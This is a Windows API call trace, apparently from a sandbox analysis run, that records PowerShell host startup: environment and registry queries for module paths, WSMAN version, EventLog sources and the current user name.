	[0060.782] RegQueryValueExW (in: hKey=0x62c, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x350027aadc, lpData=0x0, lpcbData=0x350027aad8*=0x0 | out: lpType=0x350027aadc*=0x0, lpData=0x0, lpcbData=0x350027aad8*=0x0) returned 0x2
	[0060.782] RegCloseKey (hKey=0x62c) returned 0x0
	[0060.835] CoTaskMemAlloc (cb=0x20c) returned 0x233e39fb080
	[0060.835] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x233e39fb080 | out: pszPath="C:\\Users\\Nd9E1FYi\\Documents") returned 0x0
	[0060.836] CoTaskMemFree (pv=0x233e39fb080) 
	[0060.836] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Documents", nBufferLength=0x105, lpBuffer=0x350027a6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Documents", lpFilePart=0x0) returned 0x1b
	[0060.837] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules;C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 1
	[0060.837] CoTaskMemAlloc (cb=0x104) returned 0x233e39e7db0
	[0060.837] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e7db0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0060.837] CoTaskMemFree (pv=0x233e39e7db0) 
	[0060.837] CoTaskMemAlloc (cb=0x104) returned 0x233e39e8300
	[0060.837] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e8300, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0060.837] CoTaskMemFree (pv=0x233e39e8300) 
	[0060.856] CoTaskMemAlloc (cb=0x104) returned 0x233e39e8850
	[0060.856] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e8850, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0060.856] CoTaskMemFree (pv=0x233e39e8850) 
	[0060.981] CoTaskMemAlloc (cb=0x104) returned 0x233e39e8da0
	[0060.981] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e8da0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0060.981] CoTaskMemFree (pv=0x233e39e8da0) 
	[0060.982] CoTaskMemAlloc (cb=0x104) returned 0x233e39e8850
	[0061.015] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e8850, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0061.016] CoTaskMemFree (pv=0x233e39e8850) 
	[0061.016] CoTaskMemAlloc (cb=0x104) returned 0x233e39e91e0
	[0061.016] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e91e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0061.016] CoTaskMemFree (pv=0x233e39e91e0) 
	[0061.024] CoTaskMemAlloc (cb=0x104) returned 0x233e39e91e0
	[0061.024] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e91e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0061.024] CoTaskMemFree (pv=0x233e39e91e0) 
	[0061.027] CoTaskMemAlloc (cb=0x104) returned 0x233e39e9620
	[0061.027] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e9620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0061.027] CoTaskMemFree (pv=0x233e39e9620) 
	[0061.027] CoTaskMemAlloc (cb=0x104) returned 0x233e39e7fd0
	[0061.028] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e7fd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0061.028] CoTaskMemFree (pv=0x233e39e7fd0) 
	[0061.032] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a7e8 | out: phkResult=0x350027a7e8*=0x63c) returned 0x0
	[0061.034] RegQueryInfoKeyW (in: hKey=0x63c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x350027a6ec, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x350027a6e8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x350027a6ec*=0x8, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x350027a6e8*=0x2, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0061.034] CoTaskMemFree (pv=0x0) 
	[0061.034] CoTaskMemAlloc (cb=0x204) returned 0x233e12da9e0
	[0061.034] RegEnumValueW (in: hKey=0x63c, dwIndex=0x0, lpValueName=0x233e12da9e0, lpcchValueName=0x350027a798, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="ServiceStackVersion", lpcchValueName=0x350027a798, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0061.035] CoTaskMemFree (pv=0x233e12da9e0) 
	[0061.035] CoTaskMemAlloc (cb=0x204) returned 0x233e12d9b70
	[0061.035] RegEnumValueW (in: hKey=0x63c, dwIndex=0x1, lpValueName=0x233e12d9b70, lpcchValueName=0x350027a798, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x350027a798, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0061.035] CoTaskMemFree (pv=0x233e12d9b70) 
	[0061.035] RegQueryValueExW (in: hKey=0x63c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x350027a77c, lpData=0x0, lpcbData=0x350027a778*=0x0 | out: lpType=0x350027a77c*=0x1, lpData=0x0, lpcbData=0x350027a778*=0x8) returned 0x0
	[0061.035] CoTaskMemAlloc (cb=0xc) returned 0x233e39fe8c0
	[0061.035] RegQueryValueExW (in: hKey=0x63c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x350027a74c, lpData=0x233e39fe8c0, lpcbData=0x350027a748*=0x8 | out: lpType=0x350027a74c*=0x1, lpData="2.0", lpcbData=0x350027a748*=0x8) returned 0x0
	[0061.035] CoTaskMemFree (pv=0x233e39fe8c0) 
	[0061.110] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a738 | out: phkResult=0x350027a738*=0x62c) returned 0x0
	[0061.110] RegQueryInfoKeyW (in: hKey=0x62c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x350027a63c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x350027a638, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x350027a63c*=0x8, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x350027a638*=0x2, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0061.110] CoTaskMemFree (pv=0x0) 
	[0061.110] CoTaskMemAlloc (cb=0x204) returned 0x233e12dabf0
	[0061.110] RegEnumValueW (in: hKey=0x62c, dwIndex=0x0, lpValueName=0x233e12dabf0, lpcchValueName=0x350027a6e8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="ServiceStackVersion", lpcchValueName=0x350027a6e8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0061.110] CoTaskMemFree (pv=0x233e12dabf0) 
	[0061.111] CoTaskMemAlloc (cb=0x204) returned 0x233e12d9b70
	[0061.111] RegEnumValueW (in: hKey=0x62c, dwIndex=0x1, lpValueName=0x233e12d9b70, lpcchValueName=0x350027a6e8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x350027a6e8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0061.111] CoTaskMemFree (pv=0x233e12d9b70) 
	[0061.111] RegQueryValueExW (in: hKey=0x62c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x350027a6cc, lpData=0x0, lpcbData=0x350027a6c8*=0x0 | out: lpType=0x350027a6cc*=0x1, lpData=0x0, lpcbData=0x350027a6c8*=0x8) returned 0x0
	[0061.111] CoTaskMemAlloc (cb=0xc) returned 0x233e39feb00
	[0061.111] RegQueryValueExW (in: hKey=0x62c, lpValueName="StackVersion", lpReserved=0x0, lpType=0x350027a69c, lpData=0x233e39feb00, lpcbData=0x350027a698*=0x8 | out: lpType=0x350027a69c*=0x1, lpData="2.0", lpcbData=0x350027a698*=0x8) returned 0x0
	[0061.111] CoTaskMemFree (pv=0x233e39feb00) 
	[0061.111] CoTaskMemAlloc (cb=0x104) returned 0x233e39e9620
	[0061.111] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e9620, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0061.112] CoTaskMemFree (pv=0x233e39e9620) 
	[0061.118] CoTaskMemAlloc (cb=0x104) returned 0x233e39e8520
	[0061.118] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x233e39e8520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0061.118] CoTaskMemFree (pv=0x233e39e8520) 
	[0061.166] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a768 | out: phkResult=0x350027a768*=0x634) returned 0x0
	[0061.167] RegQueryInfoKeyW (in: hKey=0x634, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x350027a6dc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x350027a6d8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x350027a6dc*=0x8, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x350027a6d8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0061.167] CoTaskMemFree (pv=0x0) 
	[0061.168] CoTaskMemAlloc (cb=0x204) returned 0x233e12d9b70
	[0061.168] RegEnumKeyExW (in: hKey=0x634, dwIndex=0x0, lpName=0x233e12d9b70, lpcchName=0x350027a768, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x350027a768, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0061.168] CoTaskMemFree (pv=0x233e12d9b70) 
	[0061.168] CoTaskMemFree (pv=0x0) 
	[0061.168] CoTaskMemAlloc (cb=0x204) returned 0x233e12d9b70
	[0061.168] RegEnumKeyExW (in: hKey=0x634, dwIndex=0x1, lpName=0x233e12d9b70, lpcchName=0x350027a768, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x350027a768, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0061.168] CoTaskMemFree (pv=0x233e12d9b70) 
	[0061.168] CoTaskMemFree (pv=0x0) 
	[0061.168] CoTaskMemAlloc (cb=0x204) returned 0x233e12d9b70
	[0061.168] RegEnumKeyExW (in: hKey=0x634, dwIndex=0x2, lpName=0x233e12d9b70, lpcchName=0x350027a768, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x350027a768, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0061.169] CoTaskMemFree (pv=0x233e12d9b70) 
	[0061.169] CoTaskMemFree (pv=0x0) 
	[0061.169] CoTaskMemAlloc (cb=0x204) returned 0x233e12d9b70
	[0061.169] RegEnumKeyExW (in: hKey=0x634, dwIndex=0x3, lpName=0x233e12d9b70, lpcchName=0x350027a768, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x350027a768, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0061.169] CoTaskMemFree (pv=0x233e12d9b70) 
	[0061.169] CoTaskMemFree (pv=0x0) 
	[0061.169] CoTaskMemAlloc (cb=0x204) returned 0x233e12d9b70
	[0061.169] RegEnumKeyExW (in: hKey=0x634, dwIndex=0x4, lpName=0x233e12d9b70, lpcchName=0x350027a768, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x350027a768, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0061.169] CoTaskMemFree (pv=0x233e12d9b70) 
	[0061.169] CoTaskMemFree (pv=0x0) 
	[0061.169] CoTaskMemAlloc (cb=0x204) returned 0x233e12d9b70
	[0061.169] RegEnumKeyExW (in: hKey=0x634, dwIndex=0x5, lpName=0x233e12d9b70, lpcchName=0x350027a768, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x350027a768, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0061.169] CoTaskMemFree (pv=0x233e12d9b70) 
	[0061.169] CoTaskMemFree (pv=0x0) 
	[0061.169] CoTaskMemAlloc (cb=0x204) returned 0x233e12da9e0
	[0061.169] RegEnumKeyExW (in: hKey=0x634, dwIndex=0x6, lpName=0x233e12da9e0, lpcchName=0x350027a768, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x350027a768, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0061.169] CoTaskMemFree (pv=0x233e12da9e0) 
	[0061.169] CoTaskMemFree (pv=0x0) 
	[0061.169] CoTaskMemAlloc (cb=0x204) returned 0x233e12d9b70
	[0061.169] RegEnumKeyExW (in: hKey=0x634, dwIndex=0x7, lpName=0x233e12d9b70, lpcchName=0x350027a768, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x350027a768, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0061.170] CoTaskMemFree (pv=0x233e12d9b70) 
	[0061.170] CoTaskMemFree (pv=0x0) 
	[0061.170] RegOpenKeyExW (in: hKey=0x634, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a7c8 | out: phkResult=0x350027a7c8*=0x644) returned 0x0
	[0061.170] RegOpenKeyExW (in: hKey=0x644, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a7c8 | out: phkResult=0x350027a7c8*=0x0) returned 0x2
	[0061.170] RegOpenKeyExW (in: hKey=0x634, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a7c8 | out: phkResult=0x350027a7c8*=0x648) returned 0x0
	[0061.170] RegOpenKeyExW (in: hKey=0x648, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a7c8 | out: phkResult=0x350027a7c8*=0x0) returned 0x2
	[0061.170] RegOpenKeyExW (in: hKey=0x634, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a7c8 | out: phkResult=0x350027a7c8*=0x64c) returned 0x0
	[0061.170] RegOpenKeyExW (in: hKey=0x64c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a7c8 | out: phkResult=0x350027a7c8*=0x0) returned 0x2
	[0061.170] RegOpenKeyExW (in: hKey=0x634, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a7c8 | out: phkResult=0x350027a7c8*=0x650) returned 0x0
	[0061.170] RegOpenKeyExW (in: hKey=0x650, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a7c8 | out: phkResult=0x350027a7c8*=0x0) returned 0x2
	[0061.170] RegOpenKeyExW (in: hKey=0x634, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a7c8 | out: phkResult=0x350027a7c8*=0x654) returned 0x0
	[0061.170] RegOpenKeyExW (in: hKey=0x654, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a7c8 | out: phkResult=0x350027a7c8*=0x0) returned 0x2
	[0061.170] RegOpenKeyExW (in: hKey=0x634, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a7c8 | out: phkResult=0x350027a7c8*=0x0) returned 0x5
	[0061.306] RegOpenKeyExW (in: hKey=0x634, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a7c8 | out: phkResult=0x350027a7c8*=0x658) returned 0x0
	[0061.307] RegOpenKeyExW (in: hKey=0x658, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a7c8 | out: phkResult=0x350027a7c8*=0x0) returned 0x2
	[0061.307] RegOpenKeyExW (in: hKey=0x634, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a7c8 | out: phkResult=0x350027a7c8*=0x65c) returned 0x0
	[0061.307] RegOpenKeyExW (in: hKey=0x65c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a7c8 | out: phkResult=0x350027a7c8*=0x660) returned 0x0
	[0061.307] RegCloseKey (hKey=0x660) returned 0x0
	[0061.307] RegCloseKey (hKey=0x634) returned 0x0
	[0061.308] RegCloseKey (hKey=0x65c) returned 0x0
	[0061.359] CoTaskMemAlloc (cb=0x804) returned 0x233e1210860
	[0061.359] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x233e1210860, nSize=0x350027a9d8 | out: lpNameBuffer="X2VS1CUM\\Nd9E1FYi", nSize=0x350027a9d8) returned 0x1
	[0061.360] CoTaskMemFree (pv=0x233e1210860) 
	[0061.361] CoTaskMemAlloc (cb=0x204) returned 0x233e12d9b70
	[0061.361] GetUserNameW (in: lpBuffer=0x233e12d9b70, pcbBuffer=0x350027aa18 | out: lpBuffer="Nd9E1FYi", pcbBuffer=0x350027aa18) returned 1
	[0061.361] CoTaskMemFree (pv=0x233e12d9b70) 
	[0061.470] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a718 | out: phkResult=0x350027a718*=0x65c) returned 0x0
	[0061.470] RegQueryInfoKeyW (in: hKey=0x65c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x350027a68c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x350027a688, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x350027a68c*=0x8, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x350027a688*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0061.470] CoTaskMemFree (pv=0x0) 
	[0061.470] CoTaskMemAlloc (cb=0x204) returned 0x233e12d9f90
	[0061.470] RegEnumKeyExW (in: hKey=0x65c, dwIndex=0x0, lpName=0x233e12d9f90, lpcchName=0x350027a718, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x350027a718, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0061.470] CoTaskMemFree (pv=0x233e12d9f90) 
	[0061.470] CoTaskMemFree (pv=0x0) 
	[0061.470] CoTaskMemAlloc (cb=0x204) returned 0x233e12d9b70
	[0061.470] RegEnumKeyExW (in: hKey=0x65c, dwIndex=0x1, lpName=0x233e12d9b70, lpcchName=0x350027a718, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x350027a718, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0061.470] CoTaskMemFree (pv=0x233e12d9b70) 
	[0061.470] CoTaskMemFree (pv=0x0) 
	[0061.470] CoTaskMemAlloc (cb=0x204) returned 0x233e12d9b70
	[0061.470] RegEnumKeyExW (in: hKey=0x65c, dwIndex=0x2, lpName=0x233e12d9b70, lpcchName=0x350027a718, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x350027a718, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0061.470] CoTaskMemFree (pv=0x233e12d9b70) 
	[0061.470] CoTaskMemFree (pv=0x0) 
	[0061.470] CoTaskMemAlloc (cb=0x204) returned 0x233e12d9b70
	[0061.470] RegEnumKeyExW (in: hKey=0x65c, dwIndex=0x3, lpName=0x233e12d9b70, lpcchName=0x350027a718, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x350027a718, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0061.471] CoTaskMemFree (pv=0x233e12d9b70) 
	[0061.471] CoTaskMemFree (pv=0x0) 
	[0061.471] CoTaskMemAlloc (cb=0x204) returned 0x233e12d9b70
	[0061.471] RegEnumKeyExW (in: hKey=0x65c, dwIndex=0x4, lpName=0x233e12d9b70, lpcchName=0x350027a718, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x350027a718, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0061.471] CoTaskMemFree (pv=0x233e12d9b70) 
	[0061.471] CoTaskMemFree (pv=0x0) 
	[0061.471] CoTaskMemAlloc (cb=0x204) returned 0x233e12d9b70
	[0061.471] RegEnumKeyExW (in: hKey=0x65c, dwIndex=0x5, lpName=0x233e12d9b70, lpcchName=0x350027a718, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x350027a718, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0061.471] CoTaskMemFree (pv=0x233e12d9b70) 
	[0061.471] CoTaskMemFree (pv=0x0) 
	[0061.471] CoTaskMemAlloc (cb=0x204) returned 0x233e12d9b70
	[0061.471] RegEnumKeyExW (in: hKey=0x65c, dwIndex=0x6, lpName=0x233e12d9b70, lpcchName=0x350027a718, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x350027a718, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0061.471] CoTaskMemFree (pv=0x233e12d9b70) 
	[0061.471] CoTaskMemFree (pv=0x0) 
	[0061.471] CoTaskMemAlloc (cb=0x204) returned 0x233e12d9b70
	[0061.471] RegEnumKeyExW (in: hKey=0x65c, dwIndex=0x7, lpName=0x233e12d9b70, lpcchName=0x350027a718, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x350027a718, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0061.471] CoTaskMemFree (pv=0x233e12d9b70) 
	[0061.471] CoTaskMemFree (pv=0x0) 
	[0061.472] RegOpenKeyExW (in: hKey=0x65c, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a778 | out: phkResult=0x350027a778*=0x634) returned 0x0
	[0061.472] RegOpenKeyExW (in: hKey=0x634, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a778 | out: phkResult=0x350027a778*=0x0) returned 0x2
	[0061.472] RegOpenKeyExW (in: hKey=0x65c, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a778 | out: phkResult=0x350027a778*=0x660) returned 0x0
	[0061.472] RegOpenKeyExW (in: hKey=0x660, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a778 | out: phkResult=0x350027a778*=0x0) returned 0x2
	[0061.472] RegOpenKeyExW (in: hKey=0x65c, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a778 | out: phkResult=0x350027a778*=0x664) returned 0x0
	[0061.472] RegOpenKeyExW (in: hKey=0x664, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a778 | out: phkResult=0x350027a778*=0x0) returned 0x2
	[0061.472] RegOpenKeyExW (in: hKey=0x65c, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a778 | out: phkResult=0x350027a778*=0x668) returned 0x0
	[0061.473] RegOpenKeyExW (in: hKey=0x668, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a778 | out: phkResult=0x350027a778*=0x0) returned 0x2
	[0061.473] RegOpenKeyExW (in: hKey=0x65c, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a778 | out: phkResult=0x350027a778*=0x66c) returned 0x0
	[0061.473] RegOpenKeyExW (in: hKey=0x66c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a778 | out: phkResult=0x350027a778*=0x0) returned 0x2
	[0061.473] RegOpenKeyExW (in: hKey=0x65c, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a778 | out: phkResult=0x350027a778*=0x0) returned 0x5
	[0061.475] RegOpenKeyExW (in: hKey=0x65c, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a778 | out: phkResult=0x350027a778*=0x670) returned 0x0
	[0061.475] RegOpenKeyExW (in: hKey=0x670, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a778 | out: phkResult=0x350027a778*=0x0) returned 0x2
	[0061.475] RegOpenKeyExW (in: hKey=0x65c, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a778 | out: phkResult=0x350027a778*=0x674) returned 0x0
	[0061.475] RegOpenKeyExW (in: hKey=0x674, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a778 | out: phkResult=0x350027a778*=0x678) returned 0x0
	[0061.475] RegCloseKey (hKey=0x678) returned 0x0
	[0061.475] RegCloseKey (hKey=0x65c) returned 0x0
	[0061.476] RegCloseKey (hKey=0x674) returned 0x0
	[0061.476] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x350027a718 | out: phkResult=0x350027a718*=0x674) returned 0x0
	[0061.476] RegQueryInfoKeyW (in: hKey=0x674, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x350027a68c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x350027a688, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x350027a68c*=0x8, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x350027a688*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0061.476] CoTaskMemFree (pv=0x0) 
	[0061.476] CoTaskMemAlloc (cb=0x204) returned 0x233e12d9b70
	[0061.476] RegEnumKeyExW (in: hKey=0x674, dwIndex=0x0, lpName=0x233e12d9b70, lpcchName=0x350027a718, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x350027a718, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0061.477] CoTaskMemFree (pv=0x233e12d9b70) 
	[0061.477] CoTaskMemFree (pv=0x0) 
	[0061.477] CoTaskMemAlloc (cb=0x204) returned 0x233e12d9b70
